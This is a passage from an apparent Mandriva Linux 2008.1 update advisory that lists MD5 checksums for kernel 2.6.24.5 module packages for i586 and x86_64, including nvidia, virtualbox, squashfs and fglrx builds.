2008.1/i586/nvidia71xx-kernel-2.6.24.5-desktop586-1mnb-71.86.04-4mdv2008.1.i586.rpm d77e7700c5a673f9986ba4bbda9a0a28 2008.1/i586/nvidia71xx-kernel-2.6.24.5-laptop-1mnb-71.86.04-4mdv2008.1.i586.rpm c6988d69f33aa8526f847ac920bd585c 2008.1/i586/nvidia71xx-kernel-2.6.24.5-server-1mnb-71.86.04-4mdv2008.1.i586.rpm 54a5611356707771fc8e217d270d1809 2008.1/i586/nvidia71xx-kernel-desktop586-latest-71.86.04-1.20080528.4mdv2008.1.i586.rpm 96a5c9a40e4c73b14b5ab0238adaaf08 2008.1/i586/nvidia71xx-kernel-desktop-latest-71.86.04-1.20080528.4mdv2008.1.i586.rpm 2d26601d686025cab7e2a98bcd38c0ba 2008.1/i586/nvidia71xx-kernel-laptop-latest-71.86.04-1.20080528.4mdv2008.1.i586.rpm 61bface14d95ce147e8d3fffa2ebbcd5 2008.1/i586/nvidia71xx-kernel-server-latest-71.86.04-1.20080528.4mdv2008.1.i586.rpm 0236a1b936d48f24083be6c01130395b 2008.1/i586/nvidia96xx-kernel-2.6.24.5-desktop-1mnb-96.43.05-4mdv2008.1.i586.rpm b15d4751edd223ee3b4fea210e1f9532 2008.1/i586/nvidia96xx-kernel-2.6.24.5-desktop586-1mnb-96.43.05-4mdv2008.1.i586.rpm 803a5f050b5cb672820233084b9ec8c1 2008.1/i586/nvidia96xx-kernel-2.6.24.5-laptop-1mnb-96.43.05-4mdv2008.1.i586.rpm fed1c61455d43113e742e1c6dd688143 2008.1/i586/nvidia96xx-kernel-2.6.24.5-server-1mnb-96.43.05-4mdv2008.1.i586.rpm d6024b5ddc10125ad75b807ab189198d 2008.1/i586/nvidia96xx-kernel-desktop586-latest-96.43.05-1.20080528.4mdv2008.1.i586.rpm 82830010dbd4fe99278745c440cc703b 2008.1/i586/nvidia96xx-kernel-desktop-latest-96.43.05-1.20080528.4mdv2008.1.i586.rpm a08b69eba3f51d55ce986e2bdd730726 2008.1/i586/nvidia96xx-kernel-laptop-latest-96.43.05-1.20080528.4mdv2008.1.i586.rpm 45dbca16847fefe1f518c064adab280a 2008.1/i586/nvidia96xx-kernel-server-latest-96.43.05-1.20080528.4mdv2008.1.i586.rpm f71489df12ae5f166625793c7ffb62fc 2008.1/i586/nvidia-current-kernel-2.6.24.5-desktop-1mnb-169.12-4mdv2008.1.i586.rpm b0630d5cdd755927dd79078b02d99e86 2008.1/i586/nvidia-current-kernel-2.6.24.5-desktop586-1mnb-169.12-4mdv2008.1.i586.rpm 51617871d3959259b21cbd9aca84576e 2008.1/i586/nvidia-current-kernel-2.6.24.5-laptop-1mnb-169.12-4mdv2008.1.i586.rpm 2ac21f4d81bb1eaedd8c307c76bd0b0f 2008.1/i586/nvidia-current-kernel-2.6.24.5-server-1mnb-169.12-4mdv2008.1.i586.rpm ae5868c58ae81e4791b8e65bb5c733e3 2008.1/i586/nvidia-current-kernel-desktop586-latest-169.12-1.20080528.4mdv2008.1.i586.rpm 6448e7a28a89ad1268ca0074b03d8000 2008.1/i586/nvidia-current-kernel-desktop-latest-169.12-1.20080528.4mdv2008.1.i586.rpm e5b611be32658c2daff3c24810a7d130 2008.1/i586/nvidia-current-kernel-laptop-latest-169.12-1.20080528.4mdv2008.1.i586.rpm 8caf5c866eeb9835ea2f936b4014a380 2008.1/i586/nvidia-current-kernel-server-latest-169.12-1.20080528.4mdv2008.1.i586.rpm 5d70f0c3b633ec0a202dcc7c00dc7a84 2008.1/i586/omfs-kernel-2.6.24.5-desktop-1mnb-0.7.6-1mdv2008.1.i586.rpm e65fee8f310aa684d47b76f9ef0cfe10 2008.1/i586/omfs-kernel-2.6.24.5-desktop586-1mnb-0.7.6-1mdv2008.1.i586.rpm b596ca4655845dce802236374ad4e463 2008.1/i586/omfs-kernel-2.6.24.5-laptop-1mnb-0.7.6-1mdv2008.1.i586.rpm 86bb89d22980fb261b8e0577f473ed0b 2008.1/i586/omfs-kernel-2.6.24.5-server-1mnb-0.7.6-1mdv2008.1.i586.rpm 5ed62a5bae26b1651359f49b311b396d 2008.1/i586/omfs-kernel-desktop586-latest-0.7.6-1.20080528.1mdv2008.1.i586.rpm 49e7c3e94ad6af20fb13c4829f0669c3 2008.1/i586/omfs-kernel-desktop-latest-0.7.6-1.20080528.1mdv2008.1.i586.rpm 533feaa233cc98809c081eec769e40d4 2008.1/i586/omfs-kernel-laptop-latest-0.7.6-1.20080528.1mdv2008.1.i586.rpm 6feaffb21a0330c937580a08476bf550 2008.1/i586/omfs-kernel-server-latest-0.7.6-1.20080528.1mdv2008.1.i586.rpm 7f7e8a05ddba27e461259b51ca365a8f 2008.1/i586/opencbm-kernel-2.6.24.5-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm 2b22297bd596c217b246fe5f225e2183 2008.1/i586/opencbm-kernel-2.6.24.5-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm 8fd3a96e02c3506e887d273d5f4117e4 2008.1/i586/opencbm-kernel-2.6.24.5-laptop-1mnb-0.4.2a-1mdv2008.1.i586.rpm 17c24a2df8e493559f4d4babbb320b8a 2008.1/i586/opencbm-kernel-2.6.24.5-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm f67dc131d961521d7aacd8a7697a2995 2008.1/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20080528.1mdv2008.1.i586.rpm 7e56cb0757240aec9f75f1ee60649688 2008.1/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20080528.1mdv2008.1.i586.rpm e66f61b39ae8c156ebeaf82821ad1d85 2008.1/i586/opencbm-kernel-laptop-latest-0.4.2a-1.20080528.1mdv2008.1.i586.rpm 35f7deaed5939bc28a13933d2093b8c3 2008.1/i586/opencbm-kernel-server-latest-0.4.2a-1.20080528.1mdv2008.1.i586.rpm c235039c019c3377d884e470d7e037c8 2008.1/i586/ov51x-jpeg-kernel-2.6.24.5-desktop-1mnb-1.5.6-1mdv2008.1.i586.rpm dc116de336b0c42c1c3238088fdd7133 2008.1/i586/ov51x-jpeg-kernel-2.6.24.5-desktop586-1mnb-1.5.6-1mdv2008.1.i586.rpm 565a43cfd361f8818a0db206719a7ed3 2008.1/i586/ov51x-jpeg-kernel-2.6.24.5-laptop-1mnb-1.5.6-1mdv2008.1.i586.rpm f45d012390a7ea1078972265c2f74eca 2008.1/i586/ov51x-jpeg-kernel-2.6.24.5-server-1mnb-1.5.6-1mdv2008.1.i586.rpm 7fe30e7cd1e5ff8e2bf047d5cec6035b 2008.1/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 2707d9f91821a5c2c418dd9f0a655ef4 2008.1/i586/ov51x-jpeg-kernel-desktop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 8344497a44bd07f11e7ca149168d3bc4 2008.1/i586/ov51x-jpeg-kernel-laptop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm a37331a412f873806fc3083dd4ae0996 2008.1/i586/ov51x-jpeg-kernel-server-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 430a824e6d46c84b79c63409aa562449 2008.1/i586/qc-usb-messenger-kernel-2.6.24.5-desktop-1mnb-1.7-1mdv2008.1.i586.rpm 1dace6b7a830564a59a606272280cb22 2008.1/i586/qc-usb-messenger-kernel-2.6.24.5-desktop586-1mnb-1.7-1mdv2008.1.i586.rpm b5ab1fe355c8b778b16359f2bbb3edc7 2008.1/i586/qc-usb-messenger-kernel-2.6.24.5-laptop-1mnb-1.7-1mdv2008.1.i586.rpm c6f23cd8fd0b72cbe0a2a0bc0e76f2c5 2008.1/i586/qc-usb-messenger-kernel-2.6.24.5-server-1mnb-1.7-1mdv2008.1.i586.rpm 588fc8e82713b71a5538473663872694 2008.1/i586/qc-usb-messenger-kernel-desktop586-latest-1.7-1.20080528.1mdv2008.1.i586.rpm 9911ff11a7630a57de631f3f350ed0f7 2008.1/i586/qc-usb-messenger-kernel-desktop-latest-1.7-1.20080528.1mdv2008.1.i586.rpm 6bc47264c76688afefb89700a02b5ea5 2008.1/i586/qc-usb-messenger-kernel-laptop-latest-1.7-1.20080528.1mdv2008.1.i586.rpm b60ed7d43b24edcd89c7ad21de95adba 2008.1/i586/qc-usb-messenger-kernel-server-latest-1.7-1.20080528.1mdv2008.1.i586.rpm a02b2ea77ccadd2091e0787b8ae87942 2008.1/i586/r5u870-kernel-2.6.24.5-desktop-1mnb-0.11.0-3mdv2008.1.i586.rpm 6c69da3b35bee3941603b91324d21cb0 2008.1/i586/r5u870-kernel-2.6.24.5-desktop586-1mnb-0.11.0-3mdv2008.1.i586.rpm 52786371457b073f91849915693447ab 2008.1/i586/r5u870-kernel-2.6.24.5-laptop-1mnb-0.11.0-3mdv2008.1.i586.rpm 7c9745cc7023de3083cf2a6ac3701372 2008.1/i586/r5u870-kernel-2.6.24.5-server-1mnb-0.11.0-3mdv2008.1.i586.rpm 7ad55906d3660abb285a247e08e47ede 2008.1/i586/r5u870-kernel-desktop586-latest-0.11.0-1.20080528.3mdv2008.1.i586.rpm 999973a83b06dd61c4ba2fc43280b1bb 2008.1/i586/r5u870-kernel-desktop-latest-0.11.0-1.20080528.3mdv2008.1.i586.rpm 0272ac8bf70c3ea68a48dd85ea0000b6 2008.1/i586/r5u870-kernel-laptop-latest-0.11.0-1.20080528.3mdv2008.1.i586.rpm 7183e463667c9782aa9ae67bfa24e39b 2008.1/i586/r5u870-kernel-server-latest-0.11.0-1.20080528.3mdv2008.1.i586.rpm 19ccf47b43284b7f6f8e4aa610e863ee 2008.1/i586/realcrypt-kernel-2.6.24.5-desktop-1mnb-4.3-1mdv2008.1.i586.rpm e82040ebd3ee05abdebf224481b1fba2 2008.1/i586/realcrypt-kernel-2.6.24.5-desktop586-1mnb-4.3-1mdv2008.1.i586.rpm 5595bfea6edc252c293bbfe0a02dd82b 2008.1/i586/realcrypt-kernel-2.6.24.5-laptop-1mnb-4.3-1mdv2008.1.i586.rpm 96ccf58eb874ff41fb37ed295a12918b 2008.1/i586/realcrypt-kernel-2.6.24.5-server-1mnb-4.3-1mdv2008.1.i586.rpm 4433ac98c69a8203ac69b5d00ba296d2 2008.1/i586/realcrypt-kernel-desktop586-latest-4.3-1.20080528.1mdv2008.1.i586.rpm d813274b9928495345cb78dab5919ada 2008.1/i586/realcrypt-kernel-desktop-latest-4.3-1.20080528.1mdv2008.1.i586.rpm 9ba934d568d2d293e6435fa9ae62daa1 2008.1/i586/realcrypt-kernel-laptop-latest-4.3-1.20080528.1mdv2008.1.i586.rpm f93e556090bc86918c76ddc9c5c94ba7 2008.1/i586/realcrypt-kernel-server-latest-4.3-1.20080528.1mdv2008.1.i586.rpm 791c95e844cb58467c6f450b82b4ff65 2008.1/i586/squashfs-kernel-2.6.24.5-desktop-1mnb-3.3-2mdv2008.1.i586.rpm 2095684faf6f2481889f6b37ce5a6c0d 2008.1/i586/squashfs-kernel-2.6.24.5-desktop586-1mnb-3.3-2mdv2008.1.i586.rpm f0b3fd413427c54fa23f61e3a2bff168 2008.1/i586/squashfs-kernel-2.6.24.5-laptop-1mnb-3.3-2mdv2008.1.i586.rpm 42c097d048891196553912b45538e643 2008.1/i586/squashfs-kernel-2.6.24.5-server-1mnb-3.3-2mdv2008.1.i586.rpm cffa05974694adeacce64ba289957c26 2008.1/i586/squashfs-kernel-desktop586-latest-3.3-1.20080528.2mdv2008.1.i586.rpm 739e52d4498bc1fb2ed6c1d8dafe9797 2008.1/i586/squashfs-kernel-desktop-latest-3.3-1.20080528.2mdv2008.1.i586.rpm a7b8b516fc3ebb91c853c98f46414803 2008.1/i586/squashfs-kernel-laptop-latest-3.3-1.20080528.2mdv2008.1.i586.rpm 026aba4fab36d08ff288e2f1c5b15e83 2008.1/i586/squashfs-kernel-server-latest-3.3-1.20080528.2mdv2008.1.i586.rpm c4c233e9adb995315080382aea56a1e5 2008.1/i586/squashfs-lzma-kernel-2.6.24.5-desktop-1mnb-3.3-1mdv2008.1.i586.rpm ea4e6fa4c3a67c2a558c3885efc03692 2008.1/i586/squashfs-lzma-kernel-2.6.24.5-desktop586-1mnb-3.3-1mdv2008.1.i586.rpm 48ecbdfc21db3d03ad35499b01f6004a 2008.1/i586/squashfs-lzma-kernel-2.6.24.5-laptop-1mnb-3.3-1mdv2008.1.i586.rpm 31a9a0da056d2a08d80e9a1fdfea3e87 2008.1/i586/squashfs-lzma-kernel-2.6.24.5-server-1mnb-3.3-1mdv2008.1.i586.rpm 859e81348036d9289789b19823ec044d 2008.1/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20080528.1mdv2008.1.i586.rpm d7348d9ef48deb62b7310cb5bb190fd8 2008.1/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20080528.1mdv2008.1.i586.rpm 0f9810c9465618da322232c227b9dd44 2008.1/i586/squashfs-lzma-kernel-laptop-latest-3.3-1.20080528.1mdv2008.1.i586.rpm d75439d914681ce47ba9304b60ce97a5 2008.1/i586/squashfs-lzma-kernel-server-latest-3.3-1.20080528.1mdv2008.1.i586.rpm ef0786f9096fad25c094919f4b5c3e81 2008.1/i586/syntek-kernel-2.6.24.5-desktop-1mnb-1.3.1-1mdv2008.1.i586.rpm 8b0baa9d64ad5a466c6fa5b11868cd1d 2008.1/i586/syntek-kernel-2.6.24.5-desktop586-1mnb-1.3.1-1mdv2008.1.i586.rpm 787469afbbe09740448abf58570de434 2008.1/i586/syntek-kernel-2.6.24.5-laptop-1mnb-1.3.1-1mdv2008.1.i586.rpm bd80b408c94073d5dde72adf67cce834 2008.1/i586/syntek-kernel-2.6.24.5-server-1mnb-1.3.1-1mdv2008.1.i586.rpm e25c96e8b72a4697359593e081eb02d7 2008.1/i586/syntek-kernel-desktop586-latest-1.3.1-1.20080528.1mdv2008.1.i586.rpm fe2c89cdccd55d371fe446921c20fa12 2008.1/i586/syntek-kernel-desktop-latest-1.3.1-1.20080528.1mdv2008.1.i586.rpm 0e78cb922bdba395a8c4f5ce74395e98 2008.1/i586/syntek-kernel-laptop-latest-1.3.1-1.20080528.1mdv2008.1.i586.rpm e632935c3152b0aa0cad6f5e49db2515 2008.1/i586/syntek-kernel-server-latest-1.3.1-1.20080528.1mdv2008.1.i586.rpm 6affa00066d2849bd65db91b235bf7d2 2008.1/i586/tp_smapi-kernel-2.6.24.5-desktop-1mnb-0.36-1mdv2008.1.i586.rpm 5d31f9ffd2e9208f02df4002a526bab7 2008.1/i586/tp_smapi-kernel-2.6.24.5-desktop586-1mnb-0.36-1mdv2008.1.i586.rpm 49e631eed437d82ba6a9b55394913b24 2008.1/i586/tp_smapi-kernel-2.6.24.5-laptop-1mnb-0.36-1mdv2008.1.i586.rpm c4ebe87369dce65fbb11eb78798c64c6 2008.1/i586/tp_smapi-kernel-2.6.24.5-server-1mnb-0.36-1mdv2008.1.i586.rpm 00d7cba5ecb77373e6ca55c0a95c8fc5 2008.1/i586/tp_smapi-kernel-desktop586-latest-0.36-1.20080528.1mdv2008.1.i586.rpm 0aa57f55bc33790784ce43512ddc4352 2008.1/i586/tp_smapi-kernel-desktop-latest-0.36-1.20080528.1mdv2008.1.i586.rpm 64788e56de2930252234213a99a21c9d 2008.1/i586/tp_smapi-kernel-laptop-latest-0.36-1.20080528.1mdv2008.1.i586.rpm fed71db1bc06d7c082a345ea737c6688 2008.1/i586/tp_smapi-kernel-server-latest-0.36-1.20080528.1mdv2008.1.i586.rpm 6ce51af1c0d9a824c7534062cb120540 2008.1/i586/unicorn-kernel-2.6.24.5-desktop-1mnb-0.9.3-7mdv2008.1.i586.rpm 1a1f7937c14ae98f0d1549d6a25bba0a 2008.1/i586/unicorn-kernel-2.6.24.5-desktop586-1mnb-0.9.3-7mdv2008.1.i586.rpm 149bd070caa7fa77bd906ed66ae76c9a 2008.1/i586/unicorn-kernel-2.6.24.5-laptop-1mnb-0.9.3-7mdv2008.1.i586.rpm d2f03cad9c005243583be73cce3c7cd0 2008.1/i586/unicorn-kernel-2.6.24.5-server-1mnb-0.9.3-7mdv2008.1.i586.rpm 9e332081354e4a247fb1d703bd3b03b8 2008.1/i586/unicorn-kernel-desktop586-latest-0.9.3-1.20080528.7mdv2008.1.i586.rpm fadf75b728212bbdc933d6546bba9ebb 2008.1/i586/unicorn-kernel-desktop-latest-0.9.3-1.20080528.7mdv2008.1.i586.rpm f23dac3f5904c8fda5c4169ddb919326 2008.1/i586/unicorn-kernel-laptop-latest-0.9.3-1.20080528.7mdv2008.1.i586.rpm 9f04455c1b1994161987efbe1c9118f1 2008.1/i586/unicorn-kernel-server-latest-0.9.3-1.20080528.7mdv2008.1.i586.rpm 321c4765694b32692b6a1e4aefaf2a4c 2008.1/i586/unionfs-kernel-2.6.24.5-desktop-1mnb-1.4.1mdv2008.1-1mdv2008.1.i586.rpm df4042c9e0293fd6a931a6a46dbc14eb 2008.1/i586/unionfs-kernel-2.6.24.5-desktop586-1mnb-1.4.1mdv2008.1-1mdv2008.1.i586.rpm 629a916c97fbeae4e93bd2fac0f1d522 2008.1/i586/unionfs-kernel-2.6.24.5-laptop-1mnb-1.4.1mdv2008.1-1mdv2008.1.i586.rpm 2922db9fdba97e4fec8538bba489f79d 2008.1/i586/unionfs-kernel-2.6.24.5-server-1mnb-1.4.1mdv2008.1-1mdv2008.1.i586.rpm 21b481c6ae6f22ebba265202ee6d744f 2008.1/i586/unionfs-kernel-desktop586-latest-1.4.1mdv2008.1-1.20080528.1mdv2008.1.i586.rpm 894bd905a53a5c28c322790fdc1908a3 2008.1/i586/unionfs-kernel-desktop-latest-1.4.1mdv2008.1-1.20080528.1mdv2008.1.i586.rpm 96d01db7ad1f5ecc282ac1830db94ab7 2008.1/i586/unionfs-kernel-laptop-latest-1.4.1mdv2008.1-1.20080528.1mdv2008.1.i586.rpm 070a648f8a9173fad993eeefcf480129 2008.1/i586/unionfs-kernel-server-latest-1.4.1mdv2008.1-1.20080528.1mdv2008.1.i586.rpm f7329ae4700063432aa3d5fdd02d3fbc 2008.1/i586/vboxadd-kernel-2.6.24.5-desktop-1mnb-1.5.6-1mdv2008.1.i586.rpm f9a1e4d42025ca73123160e241c85633 2008.1/i586/vboxadd-kernel-2.6.24.5-desktop586-1mnb-1.5.6-1mdv2008.1.i586.rpm 36fdc20e363c27d3a7c54ac994ca2907 2008.1/i586/vboxadd-kernel-2.6.24.5-laptop-1mnb-1.5.6-1mdv2008.1.i586.rpm 96f3a69fef6d600364ee3f61378abe19 2008.1/i586/vboxadd-kernel-2.6.24.5-server-1mnb-1.5.6-1mdv2008.1.i586.rpm 736beea98bb03d042887607880ec6935 2008.1/i586/vboxadd-kernel-desktop586-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm c604df1159283a825e6596c04bc4c133 2008.1/i586/vboxadd-kernel-desktop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 7dde21ec61d457968f71500b7eec6cbe 2008.1/i586/vboxadd-kernel-laptop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 77cc5691c1480e6e478d1bc83c507edf 2008.1/i586/vboxadd-kernel-server-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm a5416119eeea8a3ca239b38d6078b1d5 2008.1/i586/vboxvfs-kernel-2.6.24.5-desktop-1mnb-1.5.6-1mdv2008.1.i586.rpm 5e3f06608a6ae9967882ebac47481ceb 2008.1/i586/vboxvfs-kernel-2.6.24.5-desktop586-1mnb-1.5.6-1mdv2008.1.i586.rpm 122c3d659c6929bd416ac5ea5e350ed2 2008.1/i586/vboxvfs-kernel-2.6.24.5-laptop-1mnb-1.5.6-1mdv2008.1.i586.rpm ed2d554805296df4676237fcb1affd3c 2008.1/i586/vboxvfs-kernel-2.6.24.5-server-1mnb-1.5.6-1mdv2008.1.i586.rpm 856540a78d6d5ebb969b8fa43a330cf5 2008.1/i586/vboxvfs-kernel-desktop586-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm bf9415e81c16cbc4046ad2e9c2095e91 2008.1/i586/vboxvfs-kernel-desktop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm b31083c76e2ffc0285ade8e939d58e64 2008.1/i586/vboxvfs-kernel-laptop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 62db38f4d50525e2971147ff167b15b0 2008.1/i586/vboxvfs-kernel-server-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 74dc5eda0a97af275acc53560e2a1fd0 2008.1/i586/virtualbox-kernel-2.6.24.5-desktop-1mnb-1.5.6-1mdv2008.1.i586.rpm abbf88e9e685aa9924283a4605e82cc8 2008.1/i586/virtualbox-kernel-2.6.24.5-desktop586-1mnb-1.5.6-1mdv2008.1.i586.rpm 6d01ad23a90f80c455cdce1541f32814 2008.1/i586/virtualbox-kernel-2.6.24.5-laptop-1mnb-1.5.6-1mdv2008.1.i586.rpm 9810e9ea7f84fd8d5e591668f6212e64 2008.1/i586/virtualbox-kernel-2.6.24.5-server-1mnb-1.5.6-1mdv2008.1.i586.rpm f7e4cccd6b294bb2175849a87ab84bb7 2008.1/i586/virtualbox-kernel-desktop586-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm a9818b700f9c51bdd1bd56c1dfdee089 2008.1/i586/virtualbox-kernel-desktop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm affb7deaff46f51a95b3408231e30c98 2008.1/i586/virtualbox-kernel-laptop-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm 8a2f720305ac0abc869dc04ada0bcf4f 2008.1/i586/virtualbox-kernel-server-latest-1.5.6-1.20080528.1mdv2008.1.i586.rpm bb93a7ad294d7f225f7c81fe3289cfcf 2008.1/i586/vpnclient-kernel-2.6.24.5-desktop-1mnb-4.8.01.0640-1mdv2008.1.i586.rpm 2521c1fe0d49c119ff71287309831bd7 2008.1/i586/vpnclient-kernel-2.6.24.5-desktop586-1mnb-4.8.01.0640-1mdv2008.1.i586.rpm 9b103a2e2abe005f2a0b35b57b8149c6 2008.1/i586/vpnclient-kernel-2.6.24.5-laptop-1mnb-4.8.01.0640-1mdv2008.1.i586.rpm 6845f96c0333e3766989e6fbc9495448 2008.1/i586/vpnclient-kernel-2.6.24.5-server-1mnb-4.8.01.0640-1mdv2008.1.i586.rpm 0dc3c95eee4e72ddae771cf3ba433b53 2008.1/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20080528.1mdv2008.1.i586.rpm f764f417d9c6783e544e69823af42516 2008.1/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20080528.1mdv2008.1.i586.rpm 472ebc148b3067ccf2f3df1ec499f1da 2008.1/i586/vpnclient-kernel-laptop-latest-4.8.01.0640-1.20080528.1mdv2008.1.i586.rpm f1a453744067d6d02c5a2324b34a19f3 2008.1/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20080528.1mdv2008.1.i586.rpm ea7f869490f154505c777e4e09633695 2008.1/SRPMS/kernel-2.6.24.5-1mnb1.src.rpm Mandriva Linux 2008.1/X86_64: 2a4e8784c1a91ccbf39168e916bd5a53 2008.1/x86_64/actuator-kernel-2.6.24.5-desktop-1mnb-1.0.5-4mdv2008.1.x86_64.rpm 9490373ec90f52acea5710ae593a038a 2008.1/x86_64/actuator-kernel-2.6.24.5-laptop-1mnb-1.0.5-4mdv2008.1.x86_64.rpm 2439218c924dea879e0b35f9fb7ee5b1 2008.1/x86_64/actuator-kernel-2.6.24.5-server-1mnb-1.0.5-4mdv2008.1.x86_64.rpm 34b34e393d6fc1b7acf21db6c96bf23b 2008.1/x86_64/actuator-kernel-desktop-latest-1.0.5-1.20080528.4mdv2008.1.x86_64.rpm 31136dd5efc1f7ec097a23057d711722 2008.1/x86_64/actuator-kernel-laptop-latest-1.0.5-1.20080528.4mdv2008.1.x86_64.rpm ce0b751bd03627abd26d7606d3590bff 2008.1/x86_64/actuator-kernel-server-latest-1.0.5-1.20080528.4mdv2008.1.x86_64.rpm 71196b942722285ebcae764e81c34005 2008.1/x86_64/alsa_raoppcm-kernel-2.6.24.5-desktop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm 185ac87e74d849bd005ae52357ff2d61 2008.1/x86_64/alsa_raoppcm-kernel-2.6.24.5-laptop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm bcfea8bca8a6ed63b32509aead3e98d9 2008.1/x86_64/alsa_raoppcm-kernel-2.6.24.5-server-1mnb-0.5.1-2mdv2008.0.x86_64.rpm 41dc7faecbcb5ef19ca9dc914da2aac6 2008.1/x86_64/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20080528.2mdv2008.0.x86_64.rpm 691fc50fe0cbbaf6db879a29979a1589 2008.1/x86_64/alsa_raoppcm-kernel-laptop-latest-0.5.1-1.20080528.2mdv2008.0.x86_64.rpm 8256fdbc6407fb14616c8adce8cdba2a 2008.1/x86_64/alsa_raoppcm-kernel-server-latest-0.5.1-1.20080528.2mdv2008.0.x86_64.rpm 4acf78b0249ca56f5996acb1f7dfa977 2008.1/x86_64/dkms-pcc-acpi-kernel-2.6.24.5-desktop-1mnb-0.9-3mdv2008.1.x86_64.rpm 10c44bb07c630f2cb2627b95af8652f2 2008.1/x86_64/dkms-pcc-acpi-kernel-2.6.24.5-laptop-1mnb-0.9-3mdv2008.1.x86_64.rpm a0ec6ce8c84e56b4a55582f840014388 2008.1/x86_64/dkms-pcc-acpi-kernel-2.6.24.5-server-1mnb-0.9-3mdv2008.1.x86_64.rpm bf31e5e74731ac5508e46b8f31265be9 2008.1/x86_64/dkms-pcc-acpi-kernel-desktop-latest-0.9-1.20080528.3mdv2008.1.x86_64.rpm 421cc25331b211fb688a78f8b1c4476b 2008.1/x86_64/dkms-pcc-acpi-kernel-laptop-latest-0.9-1.20080528.3mdv2008.1.x86_64.rpm 19eb2ae7ee082116d3a2f4485eac58ae 2008.1/x86_64/dkms-pcc-acpi-kernel-server-latest-0.9-1.20080528.3mdv2008.1.x86_64.rpm 8317e3e60bd9d13d699782ca6d95ee68 2008.1/x86_64/drm-experimental-kernel-2.6.24.5-desktop-1mnb-2.3.0-1.20080223.1mdv2008.1.x86_64.rpm 792d385280a913be9f6790c838e08c31 2008.1/x86_64/drm-experimental-kernel-2.6.24.5-laptop-1mnb-2.3.0-1.20080223.1mdv2008.1.x86_64.rpm f4af49cf46327e8b82255355569474fd 2008.1/x86_64/drm-experimental-kernel-2.6.24.5-server-1mnb-2.3.0-1.20080223.1mdv2008.1.x86_64.rpm 845591817fc748581835d91715a6d1a8 2008.1/x86_64/drm-experimental-kernel-desktop-latest-2.3.0-1.20080528.1.20080223.1mdv2008.1.x86_64.rpm 2002ff7b400cd456e17ae4f360bb9c83 2008.1/x86_64/drm-experimental-kernel-laptop-latest-2.3.0-1.20080528.1.20080223.1mdv2008.1.x86_64.rpm df06d52bab125a5eef3a9469dafada69 2008.1/x86_64/drm-experimental-kernel-server-latest-2.3.0-1.20080528.1.20080223.1mdv2008.1.x86_64.rpm 7053e9e3fd94b84f2f6d62da33e39a55 2008.1/x86_64/em8300-kernel-2.6.24.5-desktop-1mnb-0.16.4-1mdv2008.1.x86_64.rpm e2dc4b9e62e3743deddc5abdd7487781 2008.1/x86_64/em8300-kernel-2.6.24.5-laptop-1mnb-0.16.4-1mdv2008.1.x86_64.rpm 384810c83ec11eaa3ead8ef77597c884 2008.1/x86_64/em8300-kernel-2.6.24.5-server-1mnb-0.16.4-1mdv2008.1.x86_64.rpm 46aa8e9fa1b747042a2d688d158ebe70 2008.1/x86_64/em8300-kernel-desktop-latest-0.16.4-1.20080528.1mdv2008.1.x86_64.rpm bd767959c5373f364723e60922d1e8c8 2008.1/x86_64/em8300-kernel-laptop-latest-0.16.4-1.20080528.1mdv2008.1.x86_64.rpm 83ab6c53c266514ceee1f5de2847bf8e 2008.1/x86_64/em8300-kernel-server-latest-0.16.4-1.20080528.1mdv2008.1.x86_64.rpm a2bc0c75c56b43f9ec4fc0597a409a6d 2008.1/x86_64/fglrx-kernel-2.6.24.5-desktop-1mnb-8.471-3mdv2008.1.x86_64.rpm 066ad9197ee592fb00ae409955ae9aa9 2008.1/x86_64/fglrx-kernel-2.6.24.5-laptop-1mnb-8.471-3mdv2008.1.x86_64.rpm 048bb9a4a97b936f143b73e2e2f3816d 2008.1/x86_64/fglrx-kernel-2.6.24.5-server-1mnb-8.471-3mdv2008.1.x86_64.rpm efd09996bd6b2b08569592d8e797c227 2008.1/x86_64/fglrx-kernel-desktop-latest-8.471-1.20080528.3mdv2008.1.x86_64.rpm 567cba4055ca7607325eb7dd074f9ae3 2008.1/x86_64/fglrx-kernel-laptop-latest-8.471-1.20080528.3mdv2008.1.x86_64.rpm 95e43a08dda22f6ac1431c08c596e0e1 2008.1/x86_64/fglrx-kernel-server-latest-8.471-1.20080528.3mdv2008.1.x86_64.rpm 7bbee9167df3f81c664a515295da0db3 2008.1/x86_64/gspca-kernel-2.6.24.5-desktop-1mnb-1.00.20-2mdv2008.1.x86_64.rpm e6e8f3c94a5b7d530ec10d3e2d2fa684 2008.1/x86_64/gspca-kernel-2.6.24.5-laptop-1mnb-1.00.20-2mdv2008.1.x86_64.rpm 0d9ec0cf283121c346d76e621b418990 2008.1/x86_64/gspca-kernel-2.6.24.5-server-1mnb-1.00.20-2mdv2008.1.x86_64.rpm 8826065610bc2813df1e7965f306871a 2008.1/x86_64/gspca-kernel-desktop-latest-1.00.20-1.20080528.2mdv2008.1.x86_64.rpm 281b6a6cdb3c92aee46a11e52d3c5158 2008.1/x86_64/gspca-kernel-laptop-latest-1.00.20-1.20080528.2mdv2008.1.x86_64.rpm aeebe69468ab5f993356e784987a86ac 2008.1/x86_64/gspca-kernel-server-latest-1.00.20-1.20080528.2mdv2008.1.x86_64.rpm 